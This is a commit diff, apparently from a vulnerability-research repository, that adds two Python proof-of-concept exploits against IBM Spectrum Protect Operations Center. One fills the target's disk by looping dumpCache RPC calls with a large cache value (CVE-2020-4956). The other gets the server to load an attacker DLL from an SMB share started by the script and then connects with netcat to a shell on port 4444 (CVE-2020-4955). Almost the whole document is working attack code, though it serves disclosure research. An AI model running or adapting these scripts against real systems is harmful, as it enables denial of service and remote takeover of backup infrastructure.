TRA-2021-03

lynerc · lynerc · commit b506052b032c · 2021-02-15T09:10:30.000-05:00
diff --git a/ibm/spectrum_protect/ibm_spoc_DebugRPC_dos_CVE-2020-4956.py b/ibm/spectrum_protect/ibm_spoc_DebugRPC_dos_CVE-2020-4956.py
@@ -0,0 +1,108 @@
+import requests, sys, argparse, re, hexdump
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+#
+# MAIN
+# 
+descr  = 'This script generates large Operations Center cache dump files on the remot host, which may fill up the file system.'
+ 
+parser = argparse.ArgumentParser(description=descr, formatter_class=argparse.RawTextHelpFormatter)
+required = parser.add_argument_group('required arguments')
+required.add_argument('-t', '--target',required=True, help='Target host')
+parser.add_argument('-p', '--port', type=int, default=11090, help='Operations Center port, default: %(default)s')
+required.add_argument('-S', '--server', required=True, help='IP/hostname of the attacker-controlled IBM Spectrum Protect Server')
+required.add_argument('-U', '--user', required=True, help='User name on the attacker-contrlled server')
+required.add_argument('-P', '--password', required=True, help='User password on the attacker-controlled server')
+
+args = parser.parse_args()
+host      = args.target
+port      = args.port
+server    = args.server
+user      = args.user
+password  = args.password
+
+print('Logging in to OC at {}:{} with credentials on attacker-controlled server {}'.format(host, port, server))
+
+# Get a login form 
+sid = None
+url = 'https://{}:{}/oc/configuration'.format(host, port)
+r = requests.get(url, verify=False) 
+if 'JSESSIONID' in r.cookies:
+  sid = r.cookies['JSESSIONID']
+if sid is None:
+  sys.exit('Failed to get a login session ID.')
+
+m = re.search('id="xtoken" value=([0-9A-F-]+)>', r.text)
+if m is None:
+  sys.exit('Failed to get xtoken.')
+  
+xtoken = m.group(1)
+
+# Perform login 
+cookies = {'JSESSIONID':sid}
+headers = {'Host': '{}:{}'.format(host, port), 'Origin': 'https://{}:{}'.format(host,port)}
+data = {
+  'connectto'     : '{}:1500'.format(server), 
+  'login'         : user, 
+  'password'      : password, 
+  'xtoken'        : xtoken,
+  'useSSL'        : 'true',
+  'useTLS12Only'  : 'true',
+  'tzoffset'      : '300'
+}
+r = requests.post(url, cookies=cookies, headers = headers, data=data, verify=False, allow_redirects=False) 
+if r.status_code != 302:
+  sys.exit('Login failed.\nPlease make sure the credentials for Spectrum Protect server {} is correct and wait for at least 5 minutes or restart the Operations Center service and then rerun the script.'.format(server)) 
+
+print('Login OK')
+print('JSESSIONID : {}'.format(sid))
+print('xtoken     : {}'.format(xtoken))
+
+if 'JSESSIONID' in r.cookies:
+  sid = r.cookies['JSESSIONID']
+  cookies = {'JSESSIONID':sid}
+
+#
+# setCacheValue 
+#
+# A cache value is defined by a key and a value.
+# Adjust the size to control the size of the cache dump file.
+vsize = 10000000
+key = 'KEY1'
+val = 'A' * vsize
+print('Setting an Operations Center cache value, key = {}, value_size = {} bytes'.format(key, vsize))
+cv = [key, val]
+json = {
+  'clazz'       : 'com.ibm.evo.rpc.RPCRequest',
+  'methodClazz' : 'com.ibm.tsm.gui.rpc.handlers.DebugRPC', 
+  'methodName'  : 'setCacheValue',
+  'methodArgs'  : cv 
+}
+headers = {
+  'Host'            : '{}:{}'.format(host, port), 
+  'Origin'          : 'https://{}:{}'.format(host,port),
+  'xtoken'          : xtoken,
+  'Content-Type'    : 'application/json-rpc',
+  'Accept-Encoding' : 'deflate, gzip'
+}
+url = 'https://{}:{}/oc/RPCAdapter'.format(host, port)
+r = requests.post(url, cookies=cookies, headers = headers, json=json, verify=False, allow_redirects=False) 
+if r.json()['clazz'] != 'com.ibm.evo.rpc.RPCResponse':
+  sys.exit('Failed to set a cache value.')
+
+#
+# dumpCache 
+# cache dump files will be created. 
+#
+json['methodName'] = 'dumpCache'
+json['methodArgs'] = [] 
+print('Repeatedly issuing dumpCache RPC calls, the following files are created on the remote OC host')
+print('Press Control-C to stop')
+while True:
+  r = requests.post(url, cookies=cookies, headers = headers, json=json, verify=False, allow_redirects=False) 
+  t = r.json()['result'].strip()
+  print(t, end='\r', flush=True)
+
diff --git a/ibm/spectrum_protect/ibm_spoc_QueryReadStoreCache_rce_CVE-2020-4955.py b/ibm/spectrum_protect/ibm_spoc_QueryReadStoreCache_rce_CVE-2020-4955.py
@@ -0,0 +1,114 @@
+import requests, sys, argparse, re ,os.path
+import threading, socket, subprocess, shlex
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from impacket import smbserver
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def smb_server(lip, share):
+    server = smbserver.SimpleSMBServer(listenAddress=lip, listenPort=445)
+    server.addShare(share, '.', '')
+    server.setSMBChallenge('')
+    server.setLogFile('/dev/null')
+    server.start()
+
+#
+# MAIN
+# 
+descr  = 'This script attempts to inject a DLL into the Operations Center process.'
+ 
+parser = argparse.ArgumentParser(description=descr, formatter_class=argparse.RawTextHelpFormatter)
+required = parser.add_argument_group('required arguments')
+required.add_argument('-t', '--target',required=True, help='Target host')
+parser.add_argument('-p', '--port', type=int, default=11090, help='Operations Center port, default: %(default)s')
+required.add_argument('-S', '--server',required=True, help='IP/hostname of the attacker-controlled IBM Spectrum Protect Server')
+required.add_argument('-U', '--user',required=True, help='User name on the attacker-contrlled server')
+required.add_argument('-P', '--password',required=True, help='User password on the attacker-controlled server')
+required.add_argument('-d', '--dll',required=True, help='DLL to inject')
+
+args = parser.parse_args()
+host      = args.target
+port      = args.port
+server    = args.server
+user      = args.user
+password  = args.password
+dll       = args.dll
+
+cur_dir = os.getcwd()
+abspath = os.path.abspath(dll)
+dll = os.path.basename(abspath)
+
+if not os.path.isfile(cur_dir + os.sep + dll): 
+  sys.exit('DLL {} not in current directory.'.format(dll))
+
+print('Logging in to OC at {}:{} with credentials on attacker-controlled Spectrum Protect server {}'.format(host, port, server))
+
+# Get a login form 
+sid = None
+url = 'https://{}:{}/oc/configuration'.format(host, port)
+r = requests.get(url, verify=False) 
+if 'JSESSIONID' in r.cookies:
+  sid = r.cookies['JSESSIONID']
+if sid is None:
+  sys.exit('[-] Failed to get a login session ID.')
+
+m = re.search('id="xtoken" value=([0-9A-F-]+)>', r.text)
+if m is None:
+  sys.exit('[-] Failed to get xtoken.')
+xtoken = m.group(1)
+
+# Perform login 
+url = 'https://{}:{}/oc/configuration'.format(host, port)
+cookies = {'JSESSIONID':sid}
+headers = {'Host': '{}:{}'.format(host, port), 'Origin': 'https://{}:{}'.format(host,port)}
+data = {
+  'connectto'     : '{}:1500'.format(server), 
+  'login'         : user, 
+  'password'      : password, 
+  'xtoken'        : xtoken,
+  'useSSL'        : 'true',
+  'useTLS12Only'  : 'true',
+  'tzoffset'      : '300'
+}
+r = requests.post(url, cookies=cookies, headers = headers, data=data, verify=False, allow_redirects=False) 
+if r.status_code != 302:
+  sys.exit('Login failed.\nPlease make sure the credentials for Spectrum Protect server {} is correct and wait for at least 5 minutes and then rerun the script.\nIf access to the Operations Center is available, you can restart the Operations Center and rerun the script.'.format(server)) 
+
+print('Login OK')
+print('JSESSIONID : {}'.format(sid))
+print('xtoken     : {}'.format(xtoken))
+
+if 'JSESSIONID' in r.cookies:
+  sid = r.cookies['JSESSIONID']
+  cookies = {'JSESSIONID':sid}
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+my_ip = s.getsockname()[0]
+s.close()
+
+# Spin up the SMB server thread
+share = 'MYSHARE'
+print('Starting local SMB Server at {}, share: {}'.format(my_ip, share))
+smbd_thread = threading.Thread(target=smb_server, args=(my_ip,share))
+smbd_thread.daemon = True
+smbd_thread.start()
+
+path = '\\\\{}\\{}\\{}'.format(my_ip, share, dll)
+print('Invoking java.lang.System.load() on {}'.format(path))
+data = {'server' : path}
+headers = {
+  'Host'            : '{}:{}'.format(host, port), 
+  'Origin'          : 'https://{}:{}'.format(host,port),
+  'xtoken'          : xtoken,
+  'Content-Type'    : 'application/x-www-form-urlencoded',
+  'Accept-Encoding' : 'deflate, gzip'
+}
+url = 'https://{}:{}/oc/QueryReadStoreCache/java.lang.System/load'.format(host, port)
+try:
+  r = requests.post(url, cookies=cookies, headers = headers, data=data, verify=False, allow_redirects=False, timeout=4) 
+except: pass
+print('Note that this script only works against an Operations Center running on a Windows host.')
+print('Running nc {} 4444\n'.format(host)) 
+cmd = 'nc {} 4444'.format(host)
+subprocess.check_call(shlex.split(cmd))
